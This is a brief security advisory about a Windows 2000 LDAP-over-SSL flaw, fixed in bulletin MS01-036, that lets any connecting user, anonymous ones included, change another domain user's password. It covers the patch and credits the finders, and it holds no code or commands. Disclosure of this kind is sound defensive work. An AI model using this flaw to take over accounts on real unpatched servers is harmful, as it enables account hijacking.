Reported June 25, 2001, by Russ Cooper and Jon McDonald.
VERSIONS AFFECTED
-
LDAP over SLL Password Change Vulnerability in Windows 2000 Server, Windows Advanced Server, and Windows Datacenter Server
DESCRIPTION
A
vulnerability exists involving a Lightweight Directory Access Protocol (LDAP)
function that is available only if the LDAP server has been configured to
support LDAP over Secure Socket Layer (SSL) sessions. The purpose of this
function is to let users change the data attributes of directory principals. By
design, the function should check the user's authorizations before completing
the request. However, the function contains an error that manifests itself only
when the directory principal is a domain user and the data attribute is the
domain password. In this case, the function fails to check the requester's
permissions, resulting in the possibility that a malicious user can change any
other user’s domain logon password.
By design, any user who can connect to the LDAP server can also call the function affected, including users who connect through anonymous sessions. As a result, any user who can establish a connection with an affected server can exploit the vulnerability.
VENDOR RESPONSE
The vendor, Microsoft has released security bulletin MS01-036 for this vulnerability, and the company recommends that Win2K Server and Win2K AS users immediately apply the patch mentioned in the bulletin. Patches for Win2K Datacenter are hardware specific, and are available only through the original equipment manufacturer.
CREDIT
Discovered by Jon
McDonald and Russ Cooper.